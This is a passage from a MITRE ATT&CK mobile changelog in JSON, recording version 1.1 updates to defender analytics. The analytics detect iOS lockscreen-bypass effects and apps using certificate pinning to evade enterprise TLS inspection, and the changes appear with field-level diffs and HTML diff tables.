authentication, or supervised-device lock policy changed in a way that weakens or alters the authentication boundary\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application wakes, becomes active, refreshes, or foregrounds immediately after locked or inactive state transition with weak recent user interaction\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to174__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to174__0\"><a href=\"#difflib_chg_to174__top\">t</a></td><td class=\"diff_header\" id=\"from174_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Mobile&nbsp;security&nbsp;products&nbsp;can&nbsp;often&nbsp;alert&nbsp;the&nbsp;user&nbsp;if&nbsp;their&nbsp;d</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to174__top\">t</a></td><td class=\"diff_header\" id=\"to174_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Defender&nbsp;correlates&nbsp;an&nbsp;iOS-specific&nbsp;reduced-confidence&nbsp;chain</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">evice&nbsp;is&nbsp;vulnerable&nbsp;to&nbsp;known&nbsp;exploits.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;where&nbsp;a&nbsp;supervised&nbsp;or&nbsp;managed&nbsp;device&nbsp;transitions&nbsp;from&nbsp;locke</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;or&nbsp;inactive&nbsp;state&nbsp;to&nbsp;interactive&nbsp;or&nbsp;application-active&nbsp;sta</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">te&nbsp;with&nbsp;weak&nbsp;evidence&nbsp;of&nbsp;expected&nbsp;user&nbsp;authentication,&nbsp;often</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;accompanied&nbsp;by&nbsp;abnormal&nbsp;protected&nbsp;posture&nbsp;change,&nbsp;trust-sta</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">te&nbsp;change,&nbsp;unexpected&nbsp;app&nbsp;wake,&nbsp;sensor&nbsp;use,&nbsp;or&nbsp;immediate&nbsp;dow</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nstream&nbsp;communication.&nbsp;Because&nbsp;direct&nbsp;visibility&nbsp;into&nbsp;locksc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">reen&nbsp;bypass&nbsp;mechanics&nbsp;on&nbsp;iOS&nbsp;is&nbsp;limited,&nbsp;the&nbsp;analytic&nbsp;priori</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tizes&nbsp;strong&nbsp;device-state&nbsp;effects&nbsp;and&nbsp;post-unlock&nbsp;behavior&nbsp;r</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ather&nbsp;than&nbsp;pretending&nbsp;to&nbsp;observe&nbsp;the&nbsp;exact&nbsp;bypass&nbsp;method.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--05191336-6d06-41f7-babb-5d079e4168ae",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-06 16:02:58.850000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0646#AN1725",
                            "external_id": "AN1725"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1725",
                    "description": "The defender correlates application TLS trust customization activity with subsequent outbound encrypted sessions that bypass enterprise interception visibility or fail only under enterprise inspection conditions. The analytic looks for an app establishing its own certificate or public-key trust logic, then initiating HTTPS sessions to destinations not aligned with approved app behavior, especially from background state or without recent user interaction. Higher-confidence observations come from Android runtime/framework telemetry showing custom trust manager, certificate validation override, or pin validation logic immediately preceding network connection attempts, combined with network evidence of failed-inspection patterns or opaque direct TLS sessions.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Application invokes custom TLS trust evaluation logic or pin validation routines (e.g., custom TrustManager, HostnameVerifier override, certificate/public key comparison) immediately before outbound TLS session establishment"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "TLS trust customization and outbound HTTPS session occur while app_state=background or device_locked=true or recent_user_interaction=false"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Managed app with undeclared secure transport behavior or app category mismatch initiates opaque TLS communications inconsistent with enterprise policy baseline"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "Application initiates HTTPS connection with repeated certificate validation failure under enterprise proxy followed by direct network retry or stable opaque TLS communication to same endpoint within correlation window"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Inspection",
                            "channel": "TLS session from mobile app fails, resets, or refuses enterprise interception while same destination/app pair repeatedly establishes direct encrypted communication pattern consistent with pinned certificate/public-key validation"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between trust customization activity and outbound TLS connection"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Apps legitimately expected to implement SSL pinning such as banking, enterprise auth, or secure messaging apps"
                        },
                        {
                            "field": "AllowedDestinationList",
                            "description": "Approved domains, IPs, and service endpoints for managed applications"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether the application is expected to establish pinned sessions only during active user-driven workflows"
                        },
                        {
                            "field": "InspectionFailureThreshold",
                            "description": "Number of repeated inspection failures or certificate mismatch events before escalating"
                        },
                        {
                            "field": "RetryPatternWindow",
                            "description": "Time tolerance for inspection failure followed by retry/direct connection pattern"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between trust customization activity and outbound TLS connection\"}, {\"field\": \"AllowedAppList\", \"description\": \"Apps legitimately expected to implement SSL pinning such as banking, enterprise auth, or secure messaging apps\"}, {\"field\": \"AllowedDestinationList\", \"description\": \"Approved domains, IPs, and service endpoints for managed applications\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether the application is expected to establish pinned sessions only during active user-driven workflows\"}, {\"field\": \"InspectionFailureThreshold\", \"description\": \"Number of repeated inspection failures or certificate mismatch events before escalating\"}, {\"field\": \"RetryPatternWindow\", \"description\": \"Time tolerance for inspection failure followed by retry/direct connection pattern\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-06 16:02:58.850000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates application TLS trust customization activity with subsequent outbound encrypted sessions that bypass enterprise interception visibility or fail only under enterprise inspection conditions. The analytic looks for an app establishing its own certificate or public-key trust logic, then initiating HTTPS sessions to destinations not aligned with approved app behavior, especially from background state or without recent user interaction. Higher-confidence observations come from Android runtime/framework telemetry showing custom trust manager, certificate validation override, or pin validation logic immediately preceding network connection attempts, combined with network evidence of failed-inspection patterns or opaque direct TLS sessions.\", \"old_value\": \"Application vetting services can detect certificate pinning by examining an application\\u2019s `network_security_config.xml` file, although this behavior can be benign.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Application invokes custom TLS trust evaluation logic or pin validation routines (e.g., custom TrustManager, HostnameVerifier override, certificate/public key comparison) immediately before outbound TLS session establishment\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--613788f2-ad72-43f5-b5f7-a93e2adc70fa\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"TLS trust customization and outbound HTTPS session occur while app_state=background or device_locked=true or recent_user_interaction=false\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Managed app with undeclared secure transport behavior or app category mismatch initiates opaque TLS communications inconsistent with enterprise policy baseline\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"Application initiates HTTPS connection with repeated certificate validation failure under enterprise proxy followed by direct network retry or stable opaque TLS communication to same endpoint within correlation window\"}, \"root['x_mitre_log_source_references'][4]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Inspection\", \"channel\": \"TLS session from mobile app fails, resets, or refuses enterprise interception while same destination/app pair repeatedly establishes direct encrypted communication pattern consistent with pinned certificate/public-key validation\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to178__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to178__0\"><a href=\"#difflib_chg_to178__top\">t</a></td><td class=\"diff_header\" id=\"from178_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;detect&nbsp;certificate&nbsp;pinning&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to178__top\">t</a></td><td class=\"diff_header\" id=\"to178_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;application&nbsp;TLS&nbsp;trust&nbsp;customization&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">by&nbsp;examining&nbsp;an&nbsp;application\u2019s&nbsp;`network_security_config.xml`&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">activity&nbsp;with&nbsp;subsequent&nbsp;outbound&nbsp;encrypted&nbsp;sessions&nbsp;that&nbsp;by</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">file,&nbsp;although&nbsp;this&nbsp;behavior&nbsp;can&nbsp;be&nbsp;benign.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pass&nbsp;enterprise&nbsp;interception&nbsp;visibility&nbsp;or&nbsp;fail&nbsp;only&nbsp;under&nbsp;e</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nterprise&nbsp;inspection&nbsp;conditions.&nbsp;The&nbsp;analytic&nbsp;looks&nbsp;for&nbsp;an&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pp&nbsp;establishing&nbsp;its&nbsp;own&nbsp;certificate&nbsp;or&nbsp;public-key&nbsp;trust&nbsp;logi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">c,&nbsp;then&nbsp;initiating&nbsp;HTTPS&nbsp;sessions&nbsp;to&nbsp;destinations&nbsp;not&nbsp;aligne</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">d&nbsp;with&nbsp;approved&nbsp;app&nbsp;behavior,&nbsp;especially&nbsp;from&nbsp;background&nbsp;sta</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">te&nbsp;or&nbsp;without&nbsp;recent&nbsp;user&nbsp;interaction.&nbsp;Higher-confidence&nbsp;obs</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ervations&nbsp;come&nbsp;from&nbsp;Android&nbsp;runtime/framework&nbsp;telemetry&nbsp;show</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ing&nbsp;custom&nbsp;trust&nbsp;manager,&nbsp;certificate&nbsp;validation&nbsp;override,&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;pin&nbsp;validation&nbsp;logic&nbsp;immediately&nbsp;preceding&nbsp;network&nbsp;connect</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ion&nbsp;attempts,&nbsp;combined&nbsp;with&nbsp;network&nbsp;evidence&nbsp;of&nbsp;failed-inspe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ction&nbsp;patterns&nbsp;or&nbsp;opaque&nbsp;direct&nbsp;TLS&nbsp;sessions.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--93a35555-f71e-4230-9f2a-529a539e8612",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-08 16:26:13.027000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0646#AN1726",
                            "external_id": "AN1726"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1726",
                    "description": "The defender correlates supervised-device application posture and background execution context with network-side evidence that an app rejects enterprise inspection or performs certificate/public-key-bound trust behavior during TLS establishment. Because direct app-level pin-validation observability is weaker on iOS, the analytic is anchored primarily to network control-plane effects: repeated TLS handshake rejection under enterprise inspection, destination-specific inspection bypass patterns, or persistent opaque app-to-endpoint encrypted sessions inconsistent with baseline app behavior. Additional confidence comes from managed app identity, background execution context, and supervised device policy state.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Supervised managed app with undeclared secure transport behavior or unexpected network role communicates with non-baselined destination over opaque TLS"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Managed app initiates or resumes network-capable execution while app_state=background or device_locked=true before opaque TLS session attempt"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Flow",
                            "channel": "App-destination pair shows consistent inspection bypass/refusal pattern followed by direct encrypted communication or repeated short-lived TLS sessions to same endpoint within correlation window"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "NSM:Inspection",
                            "channel": "TLS handshake from iOS app repeatedly fails or is rejected only when enterprise SSL inspection certificate is presented, indicating certificate or public-key pin validation effect"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between app lifecycle event and network-side inspection failure or opaque TLS session"
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Managed apps expected to use certificate or public-key pinning for legitimate purposes"
                        },
                        {
                            "field": "AllowedDestinationList",
                            "description": "Approved endpoints expected for legitimate pinned sessions"
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Whether the app is expected to perform network establishment only during user-driven workflows"
                        },
                        {
                            "field": "InspectionFailureThreshold",
                            "description": "Number of repeated TLS-inspection failures needed before escalating confidence"
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between app lifecycle event and network-side inspection failure or opaque TLS session\"}, {\"field\": \"AllowedAppList\", \"description\": \"Managed apps expected to use certificate or public-key pinning for legitimate purposes\"}, {\"field\": \"AllowedDestinationList\", \"description\": \"Approved endpoints expected for legitimate pinned sessions\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Whether the app is expected to perform network establishment only during user-driven workflows\"}, {\"field\": \"InspectionFailureThreshold\", \"description\": \"Number of repeated TLS-inspection failures needed before escalating confidence\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-08 16:26:13.027000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates supervised-device application posture and background execution context with network-side evidence that an app rejects enterprise inspection or performs certificate/public-key-bound trust behavior during TLS establishment. Because direct app-level pin-validation observability is weaker on iOS, the analytic is anchored primarily to network control-plane effects: repeated TLS handshake rejection under enterprise inspection, destination-specific inspection bypass patterns, or persistent opaque app-to-endpoint encrypted sessions inconsistent with baseline app behavior. Additional confidence comes from managed app identity, background execution context, and supervised device policy state.\", \"old_value\": \"Application vetting services can detect certificate pinning by examining an application\\u2019s `network_security_config.xml` file, although this behavior can be benign.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Supervised managed app with undeclared secure transport behavior or unexpected network role communicates with non-baselined destination over opaque TLS\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--613788f2-ad72-43f5-b5f7-a93e2adc70fa\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][1]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Managed app initiates or resumes network-capable execution while app_state=background or device_locked=true before opaque TLS session attempt\"}, \"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Flow\", \"channel\": \"App-destination pair shows consistent inspection bypass/refusal pattern followed by direct encrypted communication or repeated short-lived TLS sessions to same endpoint within correlation window\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c\", \"name\": \"NSM:Inspection\", \"channel\": \"TLS handshake from iOS app repeatedly fails or is rejected only when enterprise SSL inspection certificate is presented, indicating certificate or public-key pin validation effect\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to199__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to199__0\"><a href=\"#difflib_chg_to199__top\">t</a></td><td class=\"diff_header\" id=\"from199_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;detect&nbsp;certificate&nbsp;pinning&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to199__top\">t</a></td><td class=\"diff_header\" id=\"to199_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;supervised-device&nbsp;application&nbsp;postur</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">by&nbsp;examining&nbsp;an&nbsp;application\u2019s&nbsp;`network_security_config.xml`&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;and&nbsp;background&nbsp;execution&nbsp;context&nbsp;with&nbsp;network-side&nbsp;evidenc</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">file,&nbsp;although&nbsp;this&nbsp;behavior&nbsp;can&nbsp;be&nbsp;benign.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;that&nbsp;an&nbsp;app&nbsp;rejects&nbsp;enterprise&nbsp;inspection&nbsp;or&nbsp;performs&nbsp;cert</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ificate/public-key-bound&nbsp;trust&nbsp;behavior&nbsp;during&nbsp;TLS&nbsp;establish</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ment.&nbsp;Because&nbsp;direct&nbsp;app-level&nbsp;pin-validation&nbsp;observability&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">is&nbsp;weaker&nbsp;on&nbsp;iOS,&nbsp;the&nbsp;analytic&nbsp;is&nbsp;anchored&nbsp;primarily&nbsp;to&nbsp;netw</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ork&nbsp;control-plane&nbsp;effects:&nbsp;repeated&nbsp;TLS&nbsp;handshake&nbsp;rejection&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">under&nbsp;enterprise&nbsp;inspection,&nbsp;destination-specific&nbsp;inspection</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;bypass&nbsp;patterns,&nbsp;or&nbsp;persistent&nbsp;opaque&nbsp;app-to-endpoint&nbsp;encry</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">pted&nbsp;sessions&nbsp;inconsistent&nbsp;with&nbsp;baseline&nbsp;app&nbsp;behavior.&nbsp;Addit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ional&nbsp;confidence&nbsp;comes&nbsp;from&nbsp;managed&nbsp;app&nbsp;identity,&nbsp;background</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 